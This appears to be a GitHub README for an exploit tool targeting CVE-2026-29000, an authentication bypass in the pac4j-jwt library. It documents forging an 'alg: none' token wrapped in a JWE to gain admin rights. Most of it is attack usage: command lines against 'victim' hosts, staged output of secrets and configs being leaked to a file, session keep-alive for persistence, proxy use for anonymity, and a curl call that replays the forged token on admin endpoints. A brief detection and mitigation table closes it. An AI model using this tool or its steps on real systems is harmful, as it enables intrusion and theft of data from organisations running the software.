tc4dy/CVE-2026-29000-PoC-Exploit

# 🚀 CVE-2026-29000 - pac4j-jwt 身份验证绕过漏洞利用 [](https://www.python.org/) [](https://nvd.nist.gov/vuln/detail/CVE-2026-29000) [](LICENSE) [](https://github.com/) ## 📌 概述 本漏洞利用程序武器化了 **CVE-2026-29000**，这是 **pac4j-jwt** 库中的一个严重 CVSS 10.0 漏洞。通过提取服务器的公共 JWKS 密钥并伪造一个带有 `alg: none` 的加密 JWE token，它能够实现完全的身份验证绕过，并一键授予完整的管理员权限。 ### 🔥 主要特性 - ✅ **无需身份验证** - 预认证漏洞利用，不需要有效的凭据 - ✅ **自动 JWKS 发现** - 扫描 15 个以上的端点，支持自定义路径 - ✅ **RSA 密钥提取** - 获取公共密钥，即时将 JWK 转换为 PEM - ✅ **JWT + JWE 伪造** - 创建 `alg:none` JWT，并使用服务器自身的公共密钥进行封装 - ✅ **完整管理员 Token** - ROLE_ADMIN，admin:true，支持配置过期时间 - ✅ **身份验证绕过** - 自动测试 8 个以上的受保护端点 - ✅ **智能信息泄露** - 枚举 20 个以上的敏感 API 路径 - ✅ **会话持久化** - Keep-alive 线程维持访问权限 - ✅ **代理支持** - 支持 HTTP/HTTPS 代理以实现匿名 - ✅ **文件导出** - 将伪造的 token 和泄露的数据保存到文件中 - ✅ **重试机制** - 为不稳定的连接提供可配置的重试 - ✅ **彩色输出** - 提供专业的基于阶段的视觉反馈 - ✅ **详细模式** - 用于故障排除的调试日志 - ✅ **无硬编码延迟** - 仅包含重试退避和 keep-alive ping ## 🎯 受影响的版本 | 库 | 受影响版本 | 已修复版本 | |---------|-------------------|------------------| | pac4j-jwt | < 5.1.5 | ≥ 5.1.5 | | pac4j-jwt | 4.x < 4.5.8 | ≥ 4.5.8 | | pac4j-jwt | 3.x < 3.18.6 | ≥ 3.18.6 | ## 📦 安装 ``` git clone https://github.com/yourusername/CVE-2026-29000-Exploit.git cd CVE-2026-29000-Exploit pip install -r requirements.txt python exploit.py --help requirements.txt: text requests>=2.31.0 urllib3>=2.0.0 pyjwt>=2.8.0 cryptography>=41.0.0 jwcrypto>=1.5.0 colorama>=0.4.6 🚀 Usage Basic One-Shot Exploit bash python exploit.py --target https://victim.com:8443 Save Forged Token + Leak Data bash python exploit.py -t https://target.corp:9443 -o admin.jwe -l stolen.txt Verbose Mode with Custom JWKS bash python exploit.py -t https://example.com:8080 --jwks /oauth/jwks.json -v With Proxy and No Keep-Alive bash python exploit.py -t https://192.168.1.100:443 --proxy http://127.0.0.1:8080 --no-keep-alive Custom Keep-Alive Interval bash python exploit.py -t https://victim.com:8443 --delay 10 --max-retries 5 SSL Verification Enabled bash python exploit.py -t https://legit.com:8443 --ssl-verify ⚙️ Command Line Arguments Argument Short Required Default Description --target -t Yes - Target URL (e.g., https://example.com:8443) --jwks -k No auto-detect Custom JWKS endpoint path --output -o No None Save forged JWE token to file --leak -l No leaked_TIMESTAMP.txt Save leaked data to file --verbose -v No False Enable debug output --proxy -p No None HTTP/HTTPS proxy --user-agent -ua No Mozilla/5.0... Custom User-Agent --no-keep-alive - No False Disable session keep-alive --delay - No 5.0 Keep-alive ping interval (seconds) --max-retries - No 3 Max retries per failed request --ssl-verify - No False Verify SSL certificates 📸 Example Output text $ python exploit.py -t https://10.10.10.100:8443 -o backdoor.jwe -l leak.txt ╔══════════════════════════════════════════════════════════════════════════════╗ ║ CVE-2026-29000 - pac4j-jwt Authentication Bypass Exploit ║ ║ The Professional One‑Click Admin Forge ║ ║ CVSS 10.0 - CRITICAL ║ ╚══════════════════════════════════════════════════════════════════════════════╝ [11:23:15] STAGE 1: Acquiring RSA public key from JWKS [11:23:15] Probing for JWKS endpoint... [11:23:16] Found JWKS at /realms/master/protocol/openid-connect/certs [11:23:16] Successfully extracted RSA public key [11:23:16] STAGE 2: Crafting JWT with alg:none & encrypting into JWE [11:23:16] Forged JWE token (truncated): eyJhbGciOiJSU0EtT0FFUC0yNTYiLCJlbmMiOiJBMjU2R0... [11:23:16] ✓ Token saved to backdoor.jwe [11:23:16] STAGE 3: Sending forged JWE as Bearer token [11:23:17] ✓ Authentication successful! Access granted to /api/users/me [11:23:17] STAGE 4: Enumerating accessible endpoints & revealing sensitive data [11:23:18] ✓ Leaked: /actuator/env (status 200) [11:23:18] ✓ Leaked: /api/users (status 200) [11:23:18] ✓ Leaked: /api/secrets (status 200) [11:23:18] ✓ Leaked: /config/server (status 200) [11:23:18] ✓ Captured 4 sensitive endpoints → saved to leak.txt [11:23:18] Keep‑alive session active (Ctrl+C to stop) [11:23:18] Token (JWE) valid for ~1 hour – reforge if expired 🧠 How It Works text ┌─────────────────────────────────────────────────────────────────┐ │ STAGE 1: Public Key Acquisition │ │ ├── Discover JWKS endpoint (15+ known paths) │ │ ├── Fetch JWK containing RSA public key │ │ └── Convert JWK → PEM format │ ├─────────────────────────────────────────────────────────────────┤ │ STAGE 2: Token Forging │ │ ├── Create JWT with alg: "none" │ │ ├── Inject admin claims (ROLE_ADMIN, admin: true) │ │ └── Encrypt JWT into JWE using server's public key │ ├─────────────────────────────────────────────────────────────────┤ │ STAGE 3: Authentication Bypass │ │ ├── Send JWE as Bearer token │ │ ├── Test 8+ protected endpoints │ │ └── Extract session cookie │ ├─────────────────────────────────────────────────────────────────┤ │ STAGE 4: Information Exfiltration │ │ ├── Enumerate 20+ sensitive API paths │ │ ├── Collect configs, users, secrets, environment │ │ └── Save all to leak file │ ├─────────────────────────────────────────────────────────────────┤ │ Keep-Alive: Ping /api/ping every N seconds │ └─────────────────────────────────────────────────────────────────┘ 🔧 Manual Token Usage After exploitation, use the saved JWE token with curl: bash curl -H "Authorization: Bearer $(cat backdoor.jwe)" https://target.com/api/admin/users 🛡️ Detection & Mitigation Detection Method Indicator Log Analysis JWT with alg: none in audit logs Network Monitoring JWKS endpoint requests from unknown IPs Version Check curl /actuator/info | grep pac4j Mitigation: Update pac4j-jwt to patched versions (≥5.1.5, ≥4.5.8, ≥3.18.6) Disable alg: none support in JWT validator Implement strict JWE validation Monitor for anomalous JWT structures ```

标签：CISA项目, CVE-2026-29000, CVSS 10.0, GHAS, Java安全, JWE伪造, JWKS公钥提取, JWT安全, pac4j-jwt, PoC, Python, Web安全, 信息泄露, 协议分析, 数据展示, 数据泄露, 无后门, 暴力破解, 权限提升, 红队, 网络安全, 蓝队分析, 身份验证绕过, 逆向工具, 隐私保护